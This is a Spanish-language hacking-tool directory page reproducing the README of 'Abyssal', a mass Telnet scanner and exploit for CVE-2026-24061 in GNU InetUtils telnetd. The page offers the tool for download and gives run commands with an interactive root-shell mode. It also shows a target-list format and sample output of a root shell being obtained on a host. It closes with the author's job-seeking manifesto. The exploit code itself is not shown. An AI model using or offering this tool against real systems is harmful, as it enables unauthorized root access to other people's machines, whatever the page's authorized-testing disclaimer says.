Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Abyssal — Abyssal es un escáner de vulnerabilidades Telnet de alto rendimiento para CVE-2026-24061, que entrega shells root en sistemas vulnerables con detección de falsos positivos. | Kitploit
Herramientas/GitHubGitHub/stoerti2/abyssal
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad de RedesPruebas de PenetraciónRed Teaming
GitHubstoerti2/abyssal

Abyssal

Abyssal es un escáner de vulnerabilidades Telnet de alto rendimiento para CVE-2026-24061, que entrega shells root en sistemas vulnerables con detección de falsos positivos.

Ver Repositorio
15hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔥 Abyssal

Escáner y Exploit de Vulnerabilidad Telnet CVE-2026-24061

Desde las profundidades, emergemos.
Multihilo, detección de falsos positivos, shell root interactiva al tener éxito.


👨‍💻 Sobre el Autor

Este proyecto fue creado por un profesional de TI con experiencia y décadas de trabajo práctico en seguridad de redes, infraestructura y desarrollo de software. A los 55 años, estoy buscando activamente nuevas oportunidades, ya sea como empleado a tiempo completo, freelancer o colaborador de proyectos. Si valoras la experiencia, el conocimiento técnico profundo y un enfoque directo para resolver problemas, pongámonos en contacto.

📫 Estoy abierto a ofertas de trabajo en todo el mundo.

✉️ Contacto: [[email protected]]


⚡ Características

  • 🚀 Escaneo multihilo — Escanea cientos de objetivos en paralelo
  • 🎯 Explotación de CVE-2026-24061 — Exploit armado para GNU InetUtils Telnetd
  • 🛡️ Detección de falsos positivos — Verifica conexiones interactivas reales
  • 💻 Shell root interactiva — Acceso directo a la shell en sistemas vulnerables
  • 📊 Registro detallado — Resultados completos con marcas de tiempo
  • 📁 Exportación de resultados — Guardado automático de objetivos vulnerables
  • 🌐 Soporte para IPv4 y CIDR — Escanea IPs individuales o subredes enteras

🚀 Instalación

Clona el repositorio

📖 Uso

Escaneo Básico (No Interactivo)

python3 abyssal.py -f targets.txt

Modo Interactivo (Obtén una Shell al Tener Éxito)

python3 abyssal.py -f targets.txt --interactive

Opciones Avanzadas

python3 abyssal.py -f targets.txt -t 20 --interactive -o scan.log

Opciones de la Línea de Comandos

Option Description

-f, --file Archivo con direcciones IP (predeterminado: ip_list.txt)

-t, --threads Número de hilos en paralelo (predeterminado: 10)

-i, --interactive Modo interactivo — obtén una shell en sistemas vulnerables

-o, --output Nombre del archivo de registro (se genera automáticamente si no se especifica)

-c, --connect-timeout Tiempo de espera de conexión en segundos (predeterminado: 5)

-s, --session-timeout Tiempo de espera de sesión en segundos (predeterminado: 10)

--version Muestra información de la versión

-h, --help Muestra el mensaje de ayuda

📂 Formato del Archivo de Objetivos Crea un archivo con un objetivo por línea:

# Single IPs
192.168.1.100
10.0.0.50

# IP with custom port
192.168.1.200:2323

# Subnet (CIDR) — support coming soon
# 192.168.1.0/24

# Comments are allowed
172.16.1.25  # Office server

📊 Ejemplo de Salida

╔═══════════════════════════════════════════════════════════════════════════════╗
║                                                                               ║
║   █████╗ ██████╗ ██╗   ██╗███████╗███████╗ █████╗ ██╗                         ║
║  ██╔══██╗██╔══██╗╚██╗ ██╔╝██╔════╝██╔════╝██╔══██╗██║                         ║
║  ███████║██████╔╝ ╚████╔╝ ███████╗███████╗███████║██║                         ║
║  ██╔══██║██╔══██╗  ╚██╔╝  ╚════██║╚════██║██╔══██║██║                         ║
║  ██║  ██║██████╔╝   ██║   ███████║███████║██║  ██║███████╗                    ║
║  ╚═╝  ╚═╝╚═════╝    ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝                    ║
║                                                                               ║
║  Abyssal - CVE-2026-24061 Telnet Vulnerability Scanner                        ║
║  "From the depths, we rise."                                                  ║
║                                                                               ║
║  Built by: Klaus Baumdick                                                     ║
║  Contact:  [email protected]                                            ║
║  Status:   Open for new opportunities worldwide                               ║
║                                                                               ║
╚═══════════════════════════════════════════════════════════════════════════════╝

⚠️  INTERACTIVE MODE ENABLED!
   On REAL login prompt or shell, control will be passed to you.
   False positives are automatically detected and ignored.
   Press CTRL+C to abort.

Starting scan with 10 parallel threads
Total: 100 targets to test
============================================================

🎯 REAL ROOT SHELL (#) ON 192.168.1.100:23 OBTAINED!
============================================================
>>> You now have shell access!
>>> Execute any commands (whoami, id, ls, etc.)
>>> Type 'exit' or press CTRL+C to close
------------------------------------------------------------

# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit

[*] Session on 192.168.1.100:23 closed.

============================================================
SCAN COMPLETED
============================================================
Duration: 45.23 seconds
Targets tested: 100

📊 SUMMARY:
  ✅ REAL VULNERABLE:  15
  🔒 PROTECTED:        42
  ❓ FAILED:           23
  🌐 UNREACHABLE:      20
  ⚠️  FALSE POSITIVES:  0

🚨 SECURITY WARNING:
  15 system(s) are REALLY vulnerable to CVE-2026-24061!
  → Disable or patch Telnet immediately!
  → Use SSH as a secure alternative!

⚠️ Disclaimer
This tool is for authorized security testing and educational purposes only.

Only use on systems you own or have explicit written permission to test

Unauthorized access to computer systems is illegal

The author assumes no responsibility for misuse of this tool

Use responsibly and at your own risk

📝 Licencia

Este proyecto está licenciado bajo la Licencia MIT — consulta el archivo LICENSE para más detalles.

🤝 Contacto

Klaus Baumdick 📫 Email: [email protected]

🔗 GitHub: github.com/stoerti2

📌 Estado: Abierto a nuevas oportunidades en todo el mundo

📚 Referencias

CVE-2026-24061

Vulnerabilidad Telnetd de GNU InetUtils

git clone https://github.com/stoerti2/abyssal.git


#┌────────────────────────────────────────────────────────────────────────┐
#│                                                                        │
#│         ███████╗████████╗ ██████╗ ███████╗██████╗ ████████╗██╗         │
#│         ██╔════╝╚══██╔══╝██╔═══██╗██╔════╝██╔══██╗╚══██╔══╝██║         │
#│         ███████╗   ██║   ██║   ██║█████╗  ██████╔╝   ██║   ██║         │
#│         ╚════██║   ██║   ██║   ██║██╔══╝  ██╔══██╗   ██║   ██║         │
#│         ███████║   ██║   ╚██████╔╝███████╗██║  ██║   ██║   ██║         │
#│         ╚══════╝   ╚═╝    ╚═════╝ ╚══════╝╚═╝  ╚═╝   ╚═╝   ╚═╝         │
#│                                                                        │
#│                       "old school, still root"                         │
#│                    "stoerti - the jobless hacker"                      │
#│                                                                        │
#│    ┌──────────────────────────────────────────────────────────────┐    │
#│    │  40 years in the trenches.     │  6 months unemployed in DE. │    │
#│    │  They fired the one who knew.  │  This is my legacy.         │    │
#│    │                   -- no patches for reality --               │    │
#│    └──────────────────────────────────────────────────────────────┘    │
#│                                                                        │
#└────────────────────────────────────────────────────────────────────────┘

Esto es Grindware

¿Qué es Grindware?

Grindware es software que existe porque nadie me paga para construir las cosas que realmente importan.

Llevo seis meses desempleado. No porque no sepa programar, sino porque al mercado ya no le importan las habilidades. Le importan las palabras de moda, los certificados y a quién conoces. Así que, en lugar de esperar un trabajo que nunca llega, construyo.

Grindware es el resultado de eso.

La filosofía de Grindware es:

Descargar herramienta